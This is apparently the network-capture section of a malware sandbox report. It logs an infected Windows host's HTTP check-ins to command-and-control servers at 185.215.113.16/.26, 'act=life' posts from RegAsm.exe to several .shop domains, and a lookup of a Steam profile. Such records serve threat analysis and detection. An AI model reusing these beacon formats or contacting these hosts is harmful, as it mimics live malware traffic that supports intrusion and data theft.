                                                                          Sep 27, 2024 04:22:07.427341938 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:07.429296970 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:07.666054010 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:07 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          82192.168.2.549830185.215.113.1680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:07.792068005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:08.488723040 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:08.494803905 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:08.722439051 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          83192.168.2.549831185.215.113.2680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:07.803957939 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:08.491035938 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:08.493088961 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:08.720652103 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          84192.168.2.549833185.215.113.2680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:08.829982996 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:09.560180902 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          85192.168.2.549834185.215.113.1680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:08.847485065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:09.572827101 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549761172.67.162.108443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:40 UTC263OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: drawzhotdog.shop
                                                                          2024-09-27 02:21:40 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:40 UTC766INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=purq5fm071nunijurgfa6f2gb4; expires=Mon, 20 Jan 2025 20:08:19 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3iYXsKes6oer1bA%2BmnEZVs0pJqmO1qpxXVDUpzXyXviFFs0Z4QEJq61QlkwdhdfgycEdStDApBSFJe99RtAkP09omyt2C62KVpUMxnQyFs72Pwdggz%2BleXhrMeB4Iz9Fh%2B0Q"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c980587ccb443bc-EWR
                                                                          2024-09-27 02:21:40 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549764104.21.4.136443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:41 UTC264OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: gutterydhowi.shop
                                                                          2024-09-27 02:21:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:41 UTC778INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=134eati16bj37th9ii1mta4pq8; expires=Mon, 20 Jan 2025 20:08:20 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUWD7WH24CRDWaoZjzgqWrRpOA1Y%2FMUAC9xeGitL81toBrvh1wvb9QGJlIdqHG6TaDYhX%2F5%2BaAyv0Q6qUrG2z1hkTzXHWnkxsSJCq5kr2Adfc%2ForNXj%2FmbSu6T7G9ErVctjDpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c98058df9497291-EWR
                                                                          2024-09-27 02:21:41 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549768188.114.97.3443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:42 UTC264OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: ghostreedmnu.shop
                                                                          2024-09-27 02:21:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:42 UTC774INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=f6em2j2ggislu8i8v4hp9tc8gg; expires=Mon, 20 Jan 2025 20:08:21 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MN5lnrsHTbvFKLcbZLm4HsAh8jMFVYb6lYx6XXEaJdwNtWoCbMgf9kRtz0uZhnminZZ0i0BpgbenScd8kdWkMPQ84NV0iYKkB4O8%2BnqmAY%2Bu0cXvVn7rs9l2p0UefjfIMtx%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c980593dae142a9-EWR
                                                                          2024-09-27 02:21:42 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549770188.114.96.3443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:43 UTC266OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: offensivedzvju.shop
                                                                          2024-09-27 02:21:43 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:43 UTC774INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:43 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=ts6u9i20rslbjm1dvlus7se6pr; expires=Mon, 20 Jan 2025 20:08:22 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYXLMlFccS1x%2FX3JeJ6OT4OXgh8KtQuhU%2Fw7DVp8oGzKN4iXdp4zPTc5h6VOum%2FCsLYihywkaGZboYBM8pi%2BNWX7jOG45d9MF4kiikMnyGp9eOZnQ1VZZfg7z%2FaQyFgArHevRte3"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c98059a5da843e0-EWR
                                                                          2024-09-27 02:21:43 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549772188.114.96.3443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:44 UTC263OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: vozmeatillu.shop
                                                                          2024-09-27 02:21:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:44 UTC766INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=73ouf5fdo9p87lr03frlk0vg23; expires=Mon, 20 Jan 2025 20:08:23 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FdKSktAXdpKHqTkCG0jcZabfFpXDrY73AgpIlWRZ8J5O29%2FWnuDKg5OXpFTnEID9zSvwU99Y%2BVIaqYLFS7fpxIOwHpZzLnF4T3k95Q4eVjE984dOvxptF5gWR0dR7m9kkr3"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c9805a0cde74313-EWR
                                                                          2024-09-27 02:21:44 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549775172.67.162.108443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:45 UTC263OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: drawzhotdog.shop
                                                                          2024-09-27 02:21:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:45 UTC770INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=gjs3rlouqdgv5n397a5fgqk2em; expires=Mon, 20 Jan 2025 20:08:24 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rg75GuV0wzt6t4cS2y%2BKtkTHruLTgqkFZxjysvQXq%2FCln3D4Je8va9uSvyQXe%2BFlvGT6aJwdx1e%2FuvSmgE02Sjj5G0QSjBipqNmsiWcXCRZcVqe4MeAKkz%2BMvgUOsLJ2GmDZ"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c9805a77d510cb2-EWR
                                                                          2024-09-27 02:21:45 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549777188.114.97.3443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:46 UTC263OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: fragnantbui.shop
                                                                          2024-09-27 02:21:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:46 UTC766INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=cctggl362qpd5nedunjtecd2h0; expires=Mon, 20 Jan 2025 20:08:25 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGuLyD36M2xyTZ7%2Fsside3ivRtC7ZCoBhc%2FkBkqd3X8yXPhgYkE43ABLgAxpgKf7LPWMYpCOf5TVnXJrqGQ5FGTUuLnMnB1TcOEYfbuvqghIwz%2BIg2l5zUwS0JnUBpqIgotd"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c9805ae5dac1a44-EWR
                                                                          2024-09-27 02:21:46 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549779188.114.96.3443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:47 UTC265OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: stogeneratmns.shop
                                                                          2024-09-27 02:21:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:47 UTC770INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=53av71jkf6dj7b7nl5vpecd43e; expires=Mon, 20 Jan 2025 20:08:26 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UeCoU2eL1FdaAt3Vr9SDyhJncsMyptBHsWewzEI6YuIOPX6Xtz3hs2GMizObTmj0LiLvr9DHnmwTDUvTZZA%2BfTPJepoVlw7oVJV8eisErmss0ASd7C2%2BgGCS1V8kZLtwvGPQt58%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c9805b47e5532ca-EWR
                                                                          2024-09-27 02:21:47 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549780172.67.208.139443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:48 UTC263OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: reinforcenh.shop
                                                                          2024-09-27 02:21:48 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:48 UTC768INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:48 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=pb3s5ln241mje21j1epn8lduii; expires=Mon, 20 Jan 2025 20:08:27 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Si%2BHJn3COZ8nroE62%2BmghbjxY37pZCRAJAK2g0UoMc%2BfH9dZ0a1R%2Bm48y61FQ7k9jXQ66xhLuF6KSOyd2lpcmMCetRAdhHqQOyEEjWDI7Hv5aWuyAPcCBxXra3lqq2aX6IGd"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c9805baab3e7c84-EWR
                                                                          2024-09-27 02:21:48 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.549783104.102.49.254443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:49 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Host: steamcommunity.com
                                                                          2024-09-27 02:21:50 UTC1870INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Content-Type: text/html; charset=UTF-8
